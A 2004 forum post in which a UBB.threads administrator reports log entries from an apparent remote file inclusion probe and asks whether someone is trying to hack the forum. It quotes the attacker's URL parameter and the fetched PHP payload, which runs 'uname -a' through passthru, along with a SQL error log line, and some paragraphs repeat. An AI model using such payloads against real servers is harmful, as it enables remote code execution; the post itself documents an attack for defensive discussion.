anyone else with "4do4sjr?" in the ubb.t logfiles - 09/24/2004 11:22 PM
Today I found some entrys in the ubb.t logs I never saw before:
There are several entrys like this one from different ubb.t scripts. All were called with http://193.150.170.160/4do4sjr? as a parameter instead of a post number. This went on for some hours, so maybe someone was manually going through the scripts.
If I call http://193.150.170.160/4do4sjr? I get this result:
<?php echo "\nbl3"; echo "bl3 "; passthru("uname -a 2>&1"); ?>
Someone trying to hack the forum?
Code
Fri, Sep 24 2004 15:21:38 +0200<br />193.150.170.160 Unable to do_query:<br />SELECT B_Main,B_Board<br />FROM w3t_Posts<br />WHERE B_Number = http://193.150.170.160/4do4sjr?<br />- You have an error in your SQL syntax...
There are several entrys like this one from different ubb.t scripts. All were called with http://193.150.170.160/4do4sjr? as a parameter instead of a post number. This went on for some hours, so maybe someone was manually going through the scripts.
If I call http://193.150.170.160/4do4sjr? I get this result:
<?php echo "\nbl3"; echo "bl3 "; passthru("uname -a 2>&1"); ?>
Someone trying to hack the forum?